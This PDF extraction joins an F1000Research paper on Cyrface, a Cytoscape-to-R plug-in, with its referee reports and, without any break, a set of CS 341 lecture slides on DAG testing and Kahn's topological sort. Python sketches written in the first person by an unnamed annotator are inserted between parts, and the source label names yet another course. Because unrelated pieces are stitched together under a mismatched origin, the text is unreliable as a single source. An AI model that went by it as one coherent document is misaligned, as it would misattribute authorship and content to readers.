{"Source-Url": "https://course.ccs.neu.edu/cs2800f21/lecture-notes.pdf", "len_cl100k_base": 6929, "olmocr-version": "0.1.48", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 33182, "total-output-tokens": 8733, "length": "2e12", "weborganizer": {"__label__adult": 0.0006475448608398438, "__label__art_design": 0.00139617919921875, "__label__crime_law": 0.0006346702575683594, "__label__education_jobs": 0.04681396484375, "__label__entertainment": 0.00028443336486816406, "__label__fashion_beauty": 0.00036406517028808594, "__label__finance_business": 0.0004525184631347656, "__label__food_dining": 0.0010595321655273438, "__label__games": 0.0022430419921875, "__label__hardware": 0.0010995864868164062, "__label__health": 0.0008673667907714844, "__label__history": 0.0006723403930664062, "__label__home_hobbies": 0.0004284381866455078, "__label__industrial": 0.0009088516235351562, "__label__literature": 0.001766204833984375, "__label__politics": 0.0004916191101074219, "__label__religion": 0.0013151168823242188, "__label__science_tech": 0.07452392578125, "__label__social_life": 0.0004935264587402344, "__label__software": 0.01413726806640625, "__label__software_dev": 0.84765625, "__label__sports_fitness": 0.0006022453308105469, "__label__transportation": 0.0009226799011230468, "__label__travel": 0.00033545494079589844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 30279, 0.01359]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 30279, 0.59039]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 30279, 0.87397]], "google_gemma-3-12b-it_contains_pii": [[0, 2473, false], [2473, 5625, null], [5625, 8785, null], [8785, 12573, null], [12573, 15313, null], [15313, 16672, null], [16672, 17649, null], [17649, 18810, null], [18810, 19962, null], [19962, 23614, null], [23614, 27597, null], [27597, 29453, null], [29453, 30279, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2473, true], [2473, 5625, null], [5625, 8785, null], [8785, 12573, null], [12573, 15313, null], [15313, 16672, null], [16672, 17649, null], [17649, 18810, null], [18810, 19962, null], [19962, 23614, null], [23614, 27597, null], [27597, 29453, null], [29453, 30279, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, true], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 30279, null]], "pdf_page_numbers": [[0, 2473, 1], [2473, 5625, 2], [5625, 8785, 3], [8785, 12573, 4], [12573, 15313, 5], [15313, 16672, 6], [16672, 17649, 7], [17649, 18810, 8], [18810, 19962, 9], [19962, 23614, 10], [23614, 27597, 11], [27597, 29453, 12], [29453, 30279, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": 
[[0, 30279, 0.0]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
a9092b17261a2b0fc13847db7509ef687000b2c5
WEB TOOL

**Cyrface: An interface from Cytoscape to R that provides a user interface to R packages [version 1; referees: 2 approved, 1 approved with reservations]**

Emanuel Gonçalves, Julio Saez-Rodriguez

The European Molecular Biology Laboratory, European Bioinformatics Institute, Cambridge, CB1 1SD, UK

---

**Abstract**

There is an increasing number of software packages to analyse biological experimental data in the R environment. In particular, Bioconductor, a repository of curated R packages, is one of the most comprehensive resources for bioinformatics and biostatistics. The use of these packages is increasing, but it requires a basic understanding of the R language, as well as the syntax of the specific package used. The availability of graphical user interfaces for these packages would decrease the learning curve and broaden their application. Here, we present a Cytoscape plug-in termed **Cyrface** that allows Cytoscape plug-ins to connect to any function and package developed in R. **Cyrface** can be used to run R packages from within the Cytoscape environment making use of a graphical user interface. Moreover, it links the R packages with the capabilities of Cytoscape and its plug-ins, in particular network visualization and analysis. **Cyrface**’s utility has been demonstrated for two Bioconductor packages (CellNOptR and DrugVsDisease), and here we further illustrate its usage by implementing a workflow of data analysis and visualization. Download links, installation instructions and user guides can be accessed from the **Cyrface** homepage (http://www.ebi.ac.uk/saezrodriguez/cyrface/).

This article is included in the Cytoscape Apps gateway.

This article is included in the EMBL-EBI gateway.

This article is included in the RPackage gateway.

This article is included in the Bioconductor gateway.

Corresponding author: Julio Saez-Rodriguez (cyrface@ebi.ac.uk)

Competing interests: No competing interests were disclosed.

How to cite this article: Gonçalves E and Saez-Rodriguez J. Cyrface: An interface from Cytoscape to R that provides a user interface to R packages [version 1; referees: 2 approved, 1 approved with reservations] F1000Research 2013, 2:192 (doi: 10.12688/f1000research.2-192.v1)

Copyright: © 2013 Gonçalves E and Saez-Rodriguez J. This is an open access article distributed under the terms of the Creative Commons Attribution Licence, which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited. Data associated with the article are available under the terms of the Creative Commons Zero "No rights reserved" data waiver (CC0 1.0 Public domain dedication).

Grant information: We acknowledge with thanks the financial support from the EU through the project "BioPreDyn" (ECFP7-KBBE-2011-5 Grant number 289434). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

Introduction

The availability of high-throughput experimental data has led to the development of multiple computational methods to analyse these data. Arguably, one of the most used environments is the statistical programming language R. Multiple R packages for computational biology and bioinformatics are available in various resources such as the Comprehensive R Archive Network (CRAN). Furthermore, Bioconductor provides a comprehensive collection of packages to analyse biological data developed in R.
These packages are subject to stringent quality control in terms of functionality and documentation. It is an open-source project hosting 671 active and curated software packages as of September 2013. For those not familiar with computational programming, learning R and running packages can be a time-consuming task, and therefore the use of intuitive graphical interfaces can enhance the usability of the tool. Cytoscape is a Java open-source framework with an intuitive graphical interface devoted to the visualization and analysis of networks. It is arguably one of the most used tools in bioinformatics, and has a variety of plug-ins to solve numerous computational biology problems. Therefore, we developed Cyrface, a plug-in for Cytoscape that facilitates an interface between any R package and Cytoscape. Cyrface is designed to integrate the major strengths of the R and Cytoscape environments by providing a general Java-to-R interface. By linking these two environments, Cyrface allows one to use Cytoscape as a user interface for R packages and Cytoscape plug-ins in order to reach the wealth of methods implemented in R. Workflow management systems such as Taverna and Galaxy can call R packages from a graphical user interface (GUI). Taverna is a standalone Java open-source tool for the general development and execution of workflows. Galaxy is an open-source web platform to assemble workflows based on genomic experimental data analysis. Thus, Cyrface complements Taverna and Galaxy by enhancing GUIs for R within a different environment with complementary features. RCytoscape is another tool that links R and Cytoscape. It is a Bioconductor R package that establishes a connection between R and Java in the opposite direction of Cyrface: it supports the connection from R to Java, whereas Cyrface allows a connection from Java to R. A typical use of RCytoscape is to handle experimental data from R and transfer the biological network to Cytoscape while controlling it within R. Hence, RCytoscape and Cyrface provide complementary features. This paper is structured as follows: firstly, we provide a description of the implementation of Cyrface. Then, to illustrate the applicability of Cyrface, we show two existing packages, CytoCopteR and DrugVsDisease (DvD), that make use of Cyrface, and we create a simplified version of the DataRail workflow to process and visualize experimental data using methods available in R. Finally, we discuss on-going and future developments. Implementation Cyrface is a Java open-source framework developed to establish the connection between Cytoscape and R. Interaction between these two different environments (invoking R within Java) is not natively supported by Java. Therefore, to achieve this, Cyrface uses the external libraries RCaller (https://code.google.com/p/rcaller/) and Rserve (http://www.rforge.net/Rserve/). On the one hand, to support the communication between Java and R, RCaller uses an R package called Runiversal that converts R objects into an XML format, thus allowing the R objects to be read by Java. On the other hand, Rserve establishes a TCP/IP server allowing other programs from various languages to connect to an R session and access its features. Rserve is currently being used by several mature projects, among them the Taverna workflow management system.
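The plumbing that RCaller and Rserve provide is essentially "hand an R expression to a running R process and read the result back". Cyrface does this from Java; purely as an illustration of the same pattern, here is a small Python sketch (mine, not part of Cyrface) that shells out to Rscript to run the kind of ggplot2/iris example mentioned below. The temporary-file approach, the output file name and the printed value are my own choices.

```python
import os
import subprocess
import tempfile
import textwrap

# Illustration only: Cyrface itself talks to R from Java, via RCaller or an
# Rserve TCP connection, not by spawning Rscript.
r_code = textwrap.dedent("""\
    library(ggplot2)
    p <- ggplot(iris, aes(Sepal.Length, Petal.Length, colour = Species)) + geom_point()
    ggsave("iris_scatter.png", p)   # output file name is arbitrary
    cat(nrow(iris))                 # print something back to the caller
""")

with tempfile.NamedTemporaryFile("w", suffix=".R", delete=False) as f:
    f.write(r_code)
    script = f.name

try:
    # Requires Rscript (and ggplot2) to be installed and on PATH.
    out = subprocess.run(["Rscript", script], capture_output=True, text=True, check=True)
    print("rows in iris:", out.stdout.strip())
finally:
    os.remove(script)
```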
Support for the Rserve and RCaller libraries in Cyrface is implemented by the RserveHandler and RCallerHandler Java classes, respectively. Both classes extend the abstract class RHandler that contains the signature of all the necessary methods to establish and maintain a connection with R. Figure 1 depicts the hierarchical structure of the Java classes responsible for handling the connection between Java and R. Moreover, it depicts the connection points between these two different environments. The Cyrface software architecture can be extended to support other Java libraries that facilitate the connection between Java and R. Thereby, this structure allows one to take advantage of the particular strengths of different libraries and to adapt to particular requirements of the users, for instance executing R commands automatically without first requiring the user to manually initiate an R session. Cyrface uses another Cytoscape plug-in termed CommandTool. CommandTool offers users the ability to script basic commands in Cytoscape, such as importing, displaying or modifying networks, through a simple command line. The integration allows users to use the simple command line of CommandTool to execute R commands within Cytoscape and directly visualise the output. On Cyrface's homepage (http://www.ebi.ac.uk/saezrodriguez/cyrface/) we provide an example using the CommandTool console to plot several characteristics of the iris data set using the ggplot2 plotting library:

[Figure: diagram of the Cyrface interaction layer with R.]

Figure 2. The Cyrface implementation of the DataRail workflow. The rounded rectangles represent the MIDAS files containing the experimental data at a given state. Hexagon nodes represent functions such as load or normalise. Green identifies steps that were successfully executed and grey identifies those that were not run yet.

Results and discussion A typical use of Cyrface is to provide a graphical user interface to R packages within Cytoscape. Cyrface is currently being used by two Cytoscape plug-ins, CytoCopteR\(^{10}\) and DvD\(^{11}\). CytoCopteR\(^{10}\) provides a simple step-by-step interface allowing users without any experience in R to use the CellNOptR (www.cellnopt.org) package and handle the input and output networks in Cytoscape. CellNOptR is an open-source software package that provides methods for building predictive logic models from signalling networks using experimental measurements. DvD\(^{11}\), Drug vs. Disease, is an R package that provides a workflow for the comparison of drug and disease gene expression profiles. It provides dynamic access to databases, such as ArrayExpress\(^{14}\), to compare drug and disease signatures to generate hypotheses of drug repurposing. The packages mentioned above are two examples of the usefulness of Cyrface in capturing the strengths of two environments. On one side, R provides a wealth of bioinformatics and biostatistics packages with very comprehensive resources such as Bioconductor and CRAN. On the other side, Cytoscape facilitates a user-friendly graphical interface for network visualisation and analysis, complemented with a variety of plug-ins addressing different computational biology problems. Cyrface links these two environments by providing a way to develop user-friendly interfaces for R packages by embedding them within Cytoscape. As an illustrative example, Cyrface provides a simple version of the DataRail\(^{12}\) workflow using methods implemented in R. DataRail is an open-source MATLAB toolbox that handles experimental data in a tabular format and provides methods to maximize and extract information using internal or external tools.
Saez-Rodriguez et al.\(^{12}\) also proposed an experimental data storing format termed Minimum Information for Data Analysis in Systems Biology (MIDAS). This is a tabular format based upon the minimum-information standards that specifies the layout of experimental data files. A typical use of DataRail is to import, store and process the input information from instruments using the MIDAS format, and export it to other MIDAS compliant software. The simplified version of the DataRail workflow implemented in Cyrface is structured in several sequential steps that allows the users to import, normalise and visualise experimental data-sets stored in the MIDAS format (see Figure 2). At any stage the users are able to export and visualise the transformed data set. An extension to the workflow was subsequently added to support the CellNOptR\(^{10}\) model training function. CellNOptR uses the experimental data and a corresponding prior-knowledge network to generate a logic model and train it to maximise the fit with the experimental measurements. Thereby, through an intuitive graphical interface, users are able to visualise a biological network, modify it and use it to assess the quality of the fit with a corresponding data set of experimental data. The workflow supports any network format that is supported by Cytoscape, for example the SIF format. Moreover, the workflow was extended to support the Systems Biology Markup Language (SBML) Qualitative Models (Qual) format\(^{15}\). SBML Qual is an extension of the SBML level 3 standard and is proposed to provide a standard representation for logic and qualitative models of biological networks. The latest specification document for SBML Qual can be found on the package homepage (http://sbml.org/Documents/Specifications/SBML_Level_3/Packages/Qualitative_Models_(qual)). Support for importing models stored in SBML Qual format is achieved using the jSBML library\(^{16}\) and the respective SBML Qual package. Supplementary material 1 provides a step-by-step tutorial and an example on how to use the workflow. Conclusions Here, we present Cyrface, a bioinformatics Java library that provides a general interaction between Cytoscape and R. Cyrface offers a way to combine a friendly graphical interface within the Cytoscape environment with any R package. A GUI should benefit beginners and occasional users; as well as being useful for training and illustration purposes, it extends the accessibility of the tool to those not familiar with the R command line interface. The Cyrface homepage (http://www.ebi.ac.uk/saezrodriguez/cyrface/) contains the link to download Cyrface, and installation and user-guide instructions. A few examples demonstrating the usefulness of the tool and the different supported libraries are also shown and explained. The source-code of Cyrface is publicly available on its Sourceforge webpage (https://sourceforge.net/projects/cyrface/) and permanently available on 10.5281/zenodo.7096. Future features for Cyrface will include the extension to the new version of Cytoscape, Cytoscape 3, and improvements to the DataRail workflow. These will include increasing its modularity and supporting other features, such as cutting and selecting specific regions of the data. Software Details Homepage: http://www.ebi.ac.uk/saezrodriguez/cyrface/. Source code: https://sourceforge.net/projects/cyrface/. License: GNU General Public License version 3.0 (GPLv3). Author contributions JSG initiated and guided the project. 
EG designed the software architecture and implemented Cyrface. EG and JSG wrote the paper. Competing interests No competing interests were disclosed. Grant information We acknowledge with thanks the financial support from the European Union through the project “BioPreDyn” (ECFP7-KBBE-2011-5 Grant number 289434). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Acknowledgements The authors would like to thank Martijn Van Iersel for helpful discussions and suggestions in the earlier stages of Cyrface development. Supplementary materials Cyrface – Tutorial Installation: 1. Go to Cyrface homepage: http://www.ebi.ac.uk/saezrodriguez/cyrface/ 2. Follow the installation instructions; Cyrface's DataRail walkthrough: 1. To start Cyrface’s DataRail workflow go to “Plugin -> Cyrface -> DataRail” 2. The full workflow should now be visible. 3. Right-click on the top MIDAS node and then select “Set MIDAS file...” to select the desired MIDAS file. After the MIDAS file is selected the node should turn green. 4. Right-click on “Load MIDAS” and then select “Load MIDAS...” option to load the previously selected MIDAS file. After the file is loaded the node should turn green. 5. After the MIDAS file is successfully loaded the second MIDAS node is now green showing that it’s ready to be normalized or visualized. 6. Right-click on the respective MIDAS node and the selecting the “Plot MIDAS...” option will pop-up a plot of the data (the plot can be exported following “File -> Save R plot...” 7. Right-click on the “Normalize” node to run the normalization function. A pop-up window will show up to allow the user to define the Normalization function arguments: a. **EC50Data**: parameter for the scaling of the data between 0 and 1, default=0.5 b. **Detection**: minimum detection level of the instrument, everything smaller will be treated as noise (NA), default to 0 c. **Saturation**: saturation level of the instrument, everything over this will be treated as NA, default to Inf 8. After normalizing the MIDAS file it can be plotted as previously and/or exported. Cyrface’s DataRail Workflow is also linked to the CellNOptR R package allowing the users to optimize a selected prior knowledge network against the just normalized MIDAS file. 9. Right-click on the “Optimize” node and select “Optimize…” function will pop-up a file browser to select the model file. Both Sif and SBML-qual formats are supported. 10. The optimization may take awhile and it’s executed using the defaults values defined in CellNOptR. 11. Right-click on the “Optimized CNO List” will show how well the optimized model fit the data. 12. For more details about the normalization function and the optimization method please visit CellNOptR package in Bioconductor or CellNOpt homepage b. http://www.cellnopt.org/ Open Peer Review Current Referee Status: ✔️ ❓ ✔️ Version 1 Referee Report 20 January 2014 doi:10.5256/f1000research.2371.r1863 Paul T. Shannon Computational Biology, Fred Hutchinson Cancer Research Institute, Seattle, WA, USA Cyrface is a welcome addition to the Cytoscape ecosystem; nicely complementary to RCytoscape. My only reservation is one which applies to my own work (the aforementioned RCytoscape), indeed as well as all parts of the Cytoscape ecosystem. My reservation has two parts: First: network biology is in its infancy and as such experimental data are woefully incomplete. 
Molecular interactions are stochastic, contingent and often very short-lived yet it is exactly these molecular interactions that we need to understand in order to predict and control cellular activity in health and disease. Second: it is (and may remain) unusual to find researchers, much less clinicians, who are adept at both programming and biomedicine. These two disciplines seem to select for, and then reinforce, different styles of thinking. Therefore progress in this field (call it network biology, or systems biology, or integrative biomedicine) requires hybrid teams: some who are very strong in biological and/or clinical sensibilities and some who are strong in computation and data analysis. Such a hybrid team, at its best, stays together long enough for mutual understanding and communication to emerge, as in the "trading language" which emerged in the world of particle physics in and around linear accelerators in the 60's (see Peter Galison's "Image and Logic"). I worry about the following scenario for Cyrface: a capable programmer hooks up the latest and greatest Bioc conductor package to Cytoscape, exposes as best they can the parameterizations offered by that package, and turns the tool over to their collaborating biologist. Experimental data is loaded and analyses or simulations run. Puzzles and inconclusive results will inevitably emerge, requiring detailed knowledge of both the strengths and weaknesses of the Bioc package. With good luck, perseverance and good data, this small working team may in time settle on a satisfactory Cyrface tool which can be reused without the constant intervention of the programmer. This will last until new data is acquired, upsetting the equilibrium, and the hybrid style of work and the back-and-forth between biologist and programmer, begins anew. I say that I worry about this scenario. It may be exactly the intended use of Cyrface; the problem it is intended to solve. But this essentially sociological characteristic (requirement?) of Cyrface is not described in the paper. I think that those of us who create bioinformatics software tend to avoid being explicit about this - and I think that this (the social & collaborative requirements of bioinformatic research) deserves a lot more attention. If indeed network biology, as I claim, is in its infancy, then it may be helpful if the ecosystem of Cytoscape-related tools are considered from this perspective. I suspect that the conclusions we might all (mostly) agree upon are: 1. User-friendly exploration of data-rich networks in a web browser (as with cytoscape.js) will become increasingly popular. 2. That user-friendliness often competes with analytical nuance and close scrutiny - biologically and clinically useful results become less likely. 3. Cyrface's connection of Cytoscape to R is a great step in the right direction, marrying as it does user-friendliness with some new analytical power in a way that is nicely complementary to Cytoscape java plugins and Cytoscape access to web services. Thus, Cyrface is a good step in the right direction. The next steps, it seems to me, include: 1. Providing easy connections to R (python, C++) analyses for cytoscape.js 2. A standard mechanism whereby scripts (R, python, Ruby, Perl) upon execution, can start up a Cytoscape or cytoscape.js session, customize it with networks, functions, buttons and menus, and with both public and laboratory data. As a generalization of Cyrface, this mechanism would encourage the rapid expansion of Cytoscape capabilities. 
These possible next steps carry on in the spirit of Cyrface, RCytoscape, and Cytoscape 3 apps, and will promote the creation and sharing of custom network analyses and shared tools, and lead to fruitful collaborations across the hybrid community of biologists, physicians and programmers. **Competing Interests:** No competing interests were disclosed. I have read this submission. I believe that I have an appropriate level of expertise to confirm that it is of an acceptable scientific standard. --- **Ghislain Bidaut** Integrative Bioinformatics, Inserm, Centre de Recherche en Cancérologie de Marseille, Marseille, France The paper is well written; however, many items require clarification: 1. My main criticism is the initial need to install several packages (RCaller, Rserve, Runiversal, Java, etc.), plus Cytoscape and the CommandTool plugin. Since I did not know if this would break my personal configuration or if I would be able to uninstall it, I was not able to perform the whole installation myself. It would be great if the authors could provide a virtual machine image with all the software preloaded so that one can try it out of the box without installation. I know from experience that Cytoscape plugins tend to work only with a single version of Cytoscape, so a clear list of all the required versions in the paper itself would be very useful. 2. The number of packages we are dealing with is very confusing. I am also afraid that with such a large number of dependencies, the program may break after any update. 3. In the Implementation section, the authors mention the "iris dataset". It would be useful to define what this is. It is also mentioned in the documentation but it is still unclear what the authors are referring to. The documentation shows an example where the ggplot2 package is used to plot "petal". Could the authors please define what this is? 4. Figure 2: It would be useful to define more accurately what type of data we are looking at here (e.g. gene expression?). 5. In the discussion, several R packages are mentioned (DvD, CytoCopteR); what are their links with the present software other than the fact that they run under R? Is it really possible to interact with them from Cytoscape? If so, the proper documentation or a tutorial should be provided. It would also be useful if an actual example using DvD along with interaction data could be shown. 6. I do not understand the example with DataRail. The usefulness of the example given is not clear to me, since it seems that no interaction data is given (for me this is the main purpose of Cytoscape). A useful example for most users might be: - A network of protein-protein interaction (PPI) data in Cytoscape. - Some expression data in R (an exprs object, for instance). An example of a question might be "How to superimpose the expression data and generate a proper network attribute from it?" **Competing Interests:** No competing interests were disclosed. I have read this submission. I believe that I have an appropriate level of expertise to confirm that it is of an acceptable scientific standard, however I have significant reservations, as outlined above. Referee Report 09 October 2013 doi:10.5256/f1000research.2371.r1866 Nikolaus Schultz ¹, B. Arman Aksoy ² ¹ Computational Biology Center, Memorial Sloan-Kettering Cancer Center, New York, NY, USA ² Memorial Sloan-Kettering Cancer Center, New York, NY, USA In this manuscript, the authors describe the Cytoscape plugin Cyrface.
Cyrface consists of two components: 1) a Java API, which is already being used by the Cytoscape plugins CytoCopteR and DrugVsDisease (both developed by the same group), and 2) a graphical user interface that connects R to Cytoscape. As a proof of concept of what kind of applications can be built on top of this interface, the plugin also supports the MIDAS and SBML-Qual formats. The article is well written and the tool is useful to the community. However, we recommend the following changes to the article to make it more appealing to potential future users: 1. As the new version of Cytoscape (3.x) is becoming more widely used by the community, the authors should explicitly state that they are targeting version 2.8 with this framework. This will reduce the confusion for users who are not as familiar with Cytoscape. 2. The tutorial in the supplementary materials helps to understand the general use case for this plug-in, but the lack of downloadable "sample" files for this example will make it harder for users to learn how to use the DataRail pipeline. We think it is important to provide example files that people can use for reproducing the figures in the manuscript. 3. The Cyrface interaction layer with R looks helpful for programmers, but can the authors comment on how these classes are different from the default Java implementations of the Rserve clients, e.g. http://rforge.net/RServe? This will help clarify why people should use Cyrface for their next project. 4. The command line interface (CommandTool) appears to be useful, but it seems that it is only capable of running commands in an isolated environment, with each command having its own session. If this is the case, can the authors comment on what the advantage of running R commands from the CommandTool is compared to initiating a terminal window and running commands directly from an R shell? Are users able to, for example, pass node/edge attribute fields to the corresponding R commands? 5. It looks like the current implementation does not support setting a different Rserve location other than localhost. Although not necessary, if users are given the option to set a different Rserve address within the plug-in, this will further lower the barrier for users who are not experienced with R to use Cyrface, where they can use a pre-installed Rserve hosted on a different machine. **Competing Interests:** No competing interests were disclosed. *We have read this submission. We believe that we have an appropriate level of expertise to confirm that it is of an acceptable scientific standard.*
CS 341: ALGORITHMS Lecture 16: graphs – topological sort, DAG testing, strongly connected components Slides by Trevor Brown (some material from Doug Stinson) trevor.brown@uwaterloo.ca (http://tbrown.pro) DFS APPLICATION: TESTING WHETHER A GRAPH IS A DAG A directed graph $G$ is a directed acyclic graph, or DAG, if $G$ contains no directed cycle. Lemma 6.7 A directed graph is a DAG if and only if a depth-first search encounters no back edges. Proof. (⇒): Any back edge creates a directed cycle. Back edge: points to an ancestor in the DFS forest • Case ($\leftarrow$): Suppose $\exists$ directed cycle. Show $\exists$ back edge. • Let $v_1, v_2, \ldots, v_k, v_1$ be a directed cycle • WLOG let $v_1$ be earliest discovered node in the cycle Consider edge $\{v_k, v_1\}$ Since $d[v_1] < d[v_k]$, $\{v_k, v_1\}$ must be a **back** or **cross** edge. Why? So when $v_1$ is discovered, $v_2, \ldots, v_k$ are all white Recall: nodes become **gray** *when discovered* Recall: every node $v_i$ that is *white-reachable* from $v_1$ when we discover $v_1$ (call $DFSVisit(v_1)$) turns **black** before $v_1$ ($f[v_i] < f[v_1]$) So $v_k$ must turn black **before** $v_1$, and we have $f[v_k] < f[v_1]$. Thus, $\{v_k, v_1\}$ must be a **back edge**. QED - **edge type** - tree - forward - back - cross - **discovery/finish times** - $d[v_k] < d[v_1] < f[v_1] < f[v_k]$ When we observe an edge from $u$ to $v$, check if $v$ is gray. Lemma 6.7 A directed graph is a DAG if and only if a depth-first search encounters no back edges. - Search for back edges - How to identify a back-edge? <table> <thead> <tr> <th>edge type</th> <th>colour of $v$</th> <th>discovery/finish times</th> </tr> </thead> <tbody> <tr> <td>tree</td> <td>white</td> <td>$d[u] &lt; d[v] &lt; f[v] &lt; f[u]$</td> </tr> <tr> <td>forward</td> <td>black</td> <td>$d[u] &lt; d[v] &lt; f[v] &lt; f[u]$</td> </tr> <tr> <td>back</td> <td>gray</td> <td>$d[v] &lt; d[u] &lt; f[u] &lt; f[v]$</td> </tr> <tr> <td>cross</td> <td>black</td> <td>$d[v] &lt; f[v] &lt; d[u] &lt; f[u]$</td> </tr> </tbody> </table> Algorithm: $DFS(G)$ $DAG \leftarrow \text{true}$ for each $v \in V(G)$ \[ \begin{align*} \text{do} & \quad \{ \text{colour}[v] \leftarrow \text{white} \\ & \qquad \{ \pi[v] \leftarrow \emptyset \\ & \quad \text{time} \leftarrow 0 \\ \text{do} & \quad \text{if } \text{colour}[v] = \text{white} \\ & \qquad \text{then } DFSvisit(v) \\ \text{return } (DAG) \end{align*} \] Algorithm: $DFSvisit(v)$ $colour[v] \leftarrow \text{gray}$ $time \leftarrow time + 1$ $d[v] \leftarrow time$ comment: $d[v]$ is the discovery time for vertex $v$ for each $w \in Adj[v]$ \[ \begin{cases} \text{if } colour[w] = \text{white} \\ \quad \text{then } \\ \quad \quad \pi[w] \leftarrow v \\ \quad \quad DFSvisit(w) \end{cases} \] if $colour[w] = \text{gray}$ then $DAG \leftarrow \text{false}$ $colour[v] \leftarrow \text{black}$ $time \leftarrow time + 1$ $f[v] \leftarrow time$ Back edge found! So we set DAG = false TOPOLOGICAL SORT Finding node orderings that satisfy given constraints **Example problem:** getting dressed in the morning **Example solution:** - **Pants before belt** - **Socks before shoes** - **Watch any time** **Diagram notes:** - Edge \( \{u, v\} \) means \( u \) must be completed before \( v \) - Could do various things first. Which ones are possible? What do they have in common? Topological sort Try to order nodes linearly so there are only pointers from left to right! IFF there is a (directed) cycle! Might not be possible! How can this happen? 
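Before getting to topological sort, here is a small Python sketch (mine, not from the slides) of the DFS-based DAG test just described: vertices are coloured white/gray/black, and an out-edge into a gray vertex is a back edge, hence a directed cycle. The adjacency-dict representation and the early return are my own simplifications of the slide's DAG flag.

```python
def is_dag(adj):
    """adj maps every vertex to a list of its out-neighbours."""
    WHITE, GRAY, BLACK = 0, 1, 2
    colour = {v: WHITE for v in adj}

    def visit(v):
        colour[v] = GRAY                      # v is discovered but not finished
        for w in adj[v]:
            if colour[w] == GRAY:             # back edge -> directed cycle
                return False
            if colour[w] == WHITE and not visit(w):
                return False
        colour[v] = BLACK                     # v is finished
        return True

    for v in adj:
        if colour[v] == WHITE and not visit(v):
            return False
    return True

print(is_dag({1: [2], 2: [3], 3: []}))    # True
print(is_dag({1: [2], 2: [3], 3: [1]}))   # False: back edge closes the cycle 1 -> 2 -> 3 -> 1
```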
Try to order nodes linearly so there are only pointers from left to right! Goal: output a serial order of tasks that can be run without worrying about dependencies (because all dependencies are already satisfied by the time a task is run). (Nodes are numbered according to one such order.) Can even schedule tasks to run in parallel! Can do 1||2 then 3||13 then 4||5||15 etc. A directed graph $G = (V, E)$ has a **topological ordering**, or **topological sort**, if there is a linear ordering $<$ of all the vertices in $V$ such that $u < v$ whenever $uv \in E$. Lemma 6.5 A DAG contains a vertex of indegree 0. Proof. Suppose we have a directed graph in which every vertex has positive indegree. Let \( v_1 \) be any vertex. For every \( i \geq 1 \), let \( v_{i+1}v_i \) be an arc. In the sequence \( v_1, v_2, v_3, \ldots \), consider the first repeated vertex, \( v_i = v_j \) where \( j > i \). Then \( v_j, v_{j-1}, \ldots, v_i \) is a directed cycle. One of these must be repeated. So there is a cycle! Theorem 6.6 A directed graph $D$ has a topological sort if and only if it is a DAG. Proof. $(\Rightarrow)$: Suppose $D$ has a directed cycle $v_1, v_2, \ldots, v_j, v_1$. Then $v_1 < v_2 < \cdots < v_j < v_1$, so a topological ordering does not exist. $(\Leftarrow)$: Suppose $D$ is a DAG. Then the algorithm below constructs a topological ordering. We call a node with indegree 0 a **source**. So this step is enqueueing all source nodes. Source nodes have no unsatisfied dependencies (are ready to be added to the topological sort). If we create a new source, enqueue it. EXAMPLE (Kahn’s Algorithm) Compute **indegree** for all vertices For each **u** in **V** For each **w** in **adj(u)** **w.deg** = **w.deg** + 1 Sources go into the queue Until **Q** is empty: pop, output that element, decrement its neighbours, enqueue new sources Algorithm: *Kahn(D)* - **compute** \( \text{deg}^- (v) \) for all vertices \( v \) - **for all** \( v \) such that \( \text{deg}^- (v) = 0 \), **insert** \( v \) into a queue \( Q \) - **for** \( i \leftarrow 1 \) **to** \( n \) - **if** \( Q \) is empty - **then return** \( () \) - **else** - **let** \( v \) be the first vertex in \( Q \) - **remove** \( v \) from \( Q \) and **output** \( v \) - **for all** \( w \) in \( \text{Adj}(v) \) - **do** - \( \text{deg}^- (w) \leftarrow \text{deg}^- (w) - 1 \) - **if** \( \text{deg}^- (w) = 0 \) - **then insert** \( w \) into \( Q \) **Running time with adjacency lists?** - Total \( O(n + m) \) - **iterations** \( O(n) \) - **per check** \( O(1) \) - **top()** \( O(1) \) - **dequeue()** \( O(1) \) - \( \sum \text{deg}(w) = m \) - **inside loop** \( O(1) \) **Total** \( O(n + m) \)
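The pseudocode above maps almost line for line onto the following Python sketch (my own rendering, not from the notes). The graph is an adjacency dict that lists every vertex as a key; a return value of None signals that the queue ran dry before all n vertices were output, i.e. the graph has a directed cycle.

```python
from collections import deque

def kahn(adj):
    indeg = {v: 0 for v in adj}
    for v in adj:
        for w in adj[v]:
            indeg[w] += 1                       # compute indegrees: O(n + m)

    q = deque(v for v in adj if indeg[v] == 0)  # all initial sources
    order = []
    while q:
        v = q.popleft()
        order.append(v)                         # output v
        for w in adj[v]:
            indeg[w] -= 1                       # "decrement its neighbours"
            if indeg[w] == 0:                   # w just became a source
                q.append(w)

    return order if len(order) == len(adj) else None  # None => not a DAG

# Getting-dressed example from the slides: pants before belt, socks before shoes.
deps = {"pants": ["belt"], "socks": ["shoes"], "belt": [], "shoes": [], "watch": []}
print(kahn(deps))   # one valid order, e.g. ['pants', 'socks', 'watch', 'belt', 'shoes']
```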
